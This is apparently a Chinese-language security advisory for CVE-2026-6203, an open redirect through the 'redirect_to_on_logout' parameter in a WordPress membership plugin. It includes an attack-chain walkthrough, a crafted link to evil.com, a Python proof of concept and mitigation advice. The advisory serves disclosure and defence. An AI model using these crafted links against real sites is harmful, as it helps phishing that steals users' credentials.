CVE-2026-6203 WordPress插件开放重定向漏洞

漏洞信息

漏洞编号

CVE-2026-6203

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress User Registration & Membership Plugin

漏洞概述

WordPress的User Registration & Membership插件在5.1.4及之前版本中存在开放重定向漏洞。该漏洞源于插件未对通过'redirect_to_on_logout' GET参数提供的URL进行充分验证。系统直接使用了WordPress的wp_redirect()函数而非限制域名的wp_safe_redirect()。尽管使用了esc_url_raw()来清理格式错误的URL，但它并不限制重定向目标为本地域名。攻击者可利用此漏洞构造特制链接，将用户在登出后重定向至潜在恶意的外部网址，从而辅助网络钓鱼攻击。

技术细节

该漏洞位于WordPress的User Registration & Membership插件处理登出重定向的逻辑中。具体代码位置在`includes/functions-ur-template.php`。当用户发起登出操作时，插件会检查`redirect_to_on_logout`参数。开发者虽然使用了`esc_url_raw()`函数对输入进行过滤，以防止XSS或协议错误，但该函数仅验证URL格式的合法性，并不验证URL的主机部分是否属于当前站点。随后，该参数被直接传递给`wp_redirect()`函数。在WordPress中，`wp_redirect()`允许重定向到任意外部URL，而`wp_safe_redirect()`则会将重定向限制在当前主机内。由于未使用安全重定向函数，且未对Host头进行白名单校验，攻击者可以构造形如`?redirect_to_on_logout=http://evil.com`的URL。当受害者点击并完成登出流程时，浏览器会跳转至攻击者控制的站点，配合钓鱼页面窃取用户凭证。

攻击链分析

STEP 1

侦察

攻击者识别出目标WordPress站点使用了User Registration & Membership插件，且版本低于等于5.1.4。

STEP 2

武器化

攻击者构造包含恶意外部URL的特制链接，利用'redirect_to_on_logout'参数，例如：http://target.com/?redirect_to_on_logout=http://evil.com。

STEP 3

交付

攻击者通过电子邮件或社交媒体将特制链接发送给目标用户，诱导其点击。

STEP 4

利用

受害者点击链接，系统接收请求并处理登出逻辑，未对重定向目标进行域名限制。

STEP 5

行动

受害者浏览器被重定向至攻击者控制的恶意网站，可能面临钓鱼攻击或进一步恶意载荷的投递。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-6203 Open Redirect
# The vulnerability exists in the 'redirect_to_on_logout' parameter.
# Replace 'target-site.com' with the actual WordPress site URL.

import requests

target_url = "http://target-site.com/"
malicious_url = "http://attacker-controlled-site.com/phishing.html"

# Construct the malicious logout URL
# The endpoint usually triggers the logout logic with the redirect parameter
exploit_url = f"{target_url}?redirect_to_on_logout={malicious_url}"

print(f"Sending request to: {exploit_url}")

try:
    response = requests.get(exploit_url, allow_redirects=False)
    # Check if the response contains a Location header pointing to the malicious site
    if response.status_code in [301, 302, 303, 307, 308]:
        location = response.headers.get('Location')
        print(f"Redirect detected to: {location}")
        if malicious_url in location:
            print("Vulnerability confirmed: Open Redirect successful.")
        else:
            print("Redirect occurred, but not to the expected malicious URL.")
    else:
        print(f"Status code: {response.status_code}. No immediate redirect observed in headers.")
except Exception as e:
    print(f"Error: {e}")

影响范围

User Registration & Membership Plugin <= 5.1.4

防御指南

临时缓解措施

建议立即更新插件至最新版本。若无法立即更新，可暂时禁用该插件或通过服务器端规则（如ModSecurity或Nginx配置）拦截包含`redirect_to_on_logout`参数且指向外部域名的请求，以阻断利用链。